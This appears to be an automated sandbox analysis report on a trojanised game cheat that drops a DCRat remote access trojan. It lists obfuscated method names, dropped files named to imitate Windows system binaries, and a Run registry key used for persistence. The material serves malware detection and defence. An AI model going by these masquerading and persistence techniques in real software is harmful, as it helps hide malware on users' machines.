Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, U9iiGtqq03BTIAdKv3Z.cs - High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, a8RCXJfyfv2YevbKcJy.cs - High entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, HhoQgiQALbTCJrMygA.cs - High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, COtroIUMm4eTIhOVxcs.cs - High entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, vf0yC3MIHlCBxsJ9ID0.cs - High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DNaNPDq8ZrMGeZQIvVs.cs - High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, yDct3lUiBGykwYgZyNe.cs - High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, kNoIPAUkfQUI8omLQgL.cs - High entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, JrnQWOUZjgUWBocdi9j.cs - High entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bakGY7MAQ9F1Mugfu6e.cs - High entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, xDRQIuqra1CCiX6RhhC.cs - High entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nfeO3JM26UEN4nRJB4s.cs - High entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, u7wHE5XO1AwJPYHADRh.cs - High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wvbMxJXf3x1mW0ua4by.cs - High entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, AjATmTqxd3qnyspZ8M5.cs - High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, tuX3ojf34ChaxjRV6c1.cs - High entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, dTG2gXqPUXjsYC5a9HK.cs - High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, sHZJEsfKSVh1hmkvGfT.cs - High entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, COhgSqfcQyyy2PSOJQt.cs - High entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, IYPXUgwBGoP6ag9jkCy.cs - High entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, KhVMlxXdSTGZrYZBTyq.cs - High entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, kMDXZWXajKvT3fbPySM.cs - High entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, t7eqoCq0pyA24xXUAbH.cs - High entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LdmVhiXGwe9HapiwJ8M.cs - High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, UhmLkBf9fCvwgVYUfIA.cs - High entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, GmeW25faKmNu3TDH8lC.cs - High entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, AM3dUaMPMLKtx58w5dK.cs - High entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, EU7jgPqZUfCh0MEvB0O.cs - High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Ahc13dEy5KVP0BqE5E.cs - High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LgEDIqhS04Car44Mop.cs - High entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, TKA1axtODGwCsrAJYh2.cs - High entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, f8k1fDtZDguyRu368hC.cs - High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, SUHxo9tNj7gNTsIAV05.cs - High entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, B0A2YIMzsWk7TS3uGdI.cs - High entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, yhRfLWt3k6bdGWArgmH.cs - High entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, eCD4fOt5DPq948iwBGO.cs - High entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Vb95fHU00YbhYDyu0gn.cs - High entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, VMFniGxPuBqy8bufcO.cs - High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, qlXAoh1gngc2opxxXE.cs - High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ScE4clqkd8XEwfbUW0Q.cs - High entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, USnMqttFK6BlomrJdIc.cs - High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, h6vuwetSTCvG7UVGrTy.cs - High entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, r70NTtMtM1uhGa8tvNh.cs - High entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mBP0oLLioGhwXAdkrn.cs - High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, KHdCRefmbkXs3K6gETN.cs - High entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LMjjpmqliahLUcLnGsv.cs - High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, fttbW4MDcJoMNSH5luT.cs - High entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DAsN0KqaOCtdgS3tEyf.cs - High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, UlZg75qsQwJiM21bO65.cs - High entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, B0aWXNMnlXn2BLGMp6h.cs - High entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, gI07OVUv4aW9pt78401.csHigh entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csHigh entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zjoE3wqcjVQABWnuZwJ.csHigh entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nldwCqME01ywJTeITCX.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, jVQRA9qILNDR4ueVNdL.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ykUT5HnIRnmAOVRT6X.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zy6GHpNEirDwbeMqaG.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, j8yowCfSyTNdR3Qg4Jh.csHigh entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'

                        Persistence and Installation Behavior

Source: C:\Users\user\Desktop\FixTsDfhiC.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (54 identical entries)
Source: C:\blockweb\portrefNet.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (54 identical entries)
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\AppReadiness\dwm.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (50 identical entries)
Source: C:\blockweb\portrefNet.exe | File created: C:\blockweb\RuntimeBroker.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\AppReadiness\dwm.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\Default\ApplicationFrameHost.exe
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | File created: C:\blockweb\portrefNet.exe
Source: C:\Users\user\Desktop\FixTsDfhiC.exe | File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\blockweb\WmiPrvSE.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\Default\ApplicationFrameHost.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\AppReadiness\dwm.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe

                        Boot Survival

Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
